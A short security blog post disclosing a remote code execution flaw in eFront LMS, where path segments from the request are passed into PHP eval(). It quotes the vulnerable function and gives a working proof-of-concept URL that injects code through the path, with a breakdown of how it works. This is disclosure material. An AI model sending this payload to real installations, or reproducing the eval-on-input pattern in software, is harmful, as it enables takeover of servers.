eFront LMS - RCE (All versions)

11:48 AM

TL,DR; Its been a while last I published a post. so this is going to be a short post about an interesting-ish RCE found in all versions of eFront LMS - reported over 120 days ago but eFront cutting the open-source version as a response instead of a patch, I am forced to notify people of this vulnerability. I will update this post if a patch for this bug is out.


In /efront/libraries/globals.php:


The following handleSEO() function is the one causing the code execution. it looks like the following:


function handleSEO() {

   if (!$GLOBALS['configuration']['seo'] && $_SERVER['PATH_INFO']) {

       $parts = explode("/", trim($_SERVER['PATH_INFO'], "/"));

       for ($i = 0; $i < sizeof($parts); $i+=2) {

           eval('$'.$parts[$i].' = "'.$parts[$i+1].'";');

       }

       //unset($parts);unset($i);

       foreach (get_defined_vars() as $key => $value) {

           $_GET[$key] = $value;

       }

   }

}


Because of their assumption that $_SERVER['PATH_INFO'] isn't user controllable, they sent it straight to eval(), causing the code execution.


PoC:


https://localhost/efonrt/libraries/globals.php/hack/x%22%3Beval(phpinfo())%3B%24t%3D%22pwnd

Decoded:


/globals.php/hack/x";eval(phpinfo());$t="pwnd

visiting the above link will get phpinfo() executed.


Breaking it down:

$parts = explode("/", trim($_SERVER['PATH_INFO'], "/"));

for ($i = 0; $i < sizeof($parts); $i+=2) {

           eval('$'.$parts[$i].' = "'.$parts[$i+1].'";');

}


Because of that specific code, we send in /globals.php/hack/x, which will become: $hack="x

, but because php already executed the code, doing a comment (/*..*/) wont work and will actually crash it, so we will just tamper the variables like x";eval(phpinfo());$t="pwnd


This will endup creating:


$hack = "x";eval(phpinfo());$t="pwnd";

Which is then interpreted as:


eval($hack = "x";eval(phpinfo());$t="pwnd";);

And Boom! We got our code executed!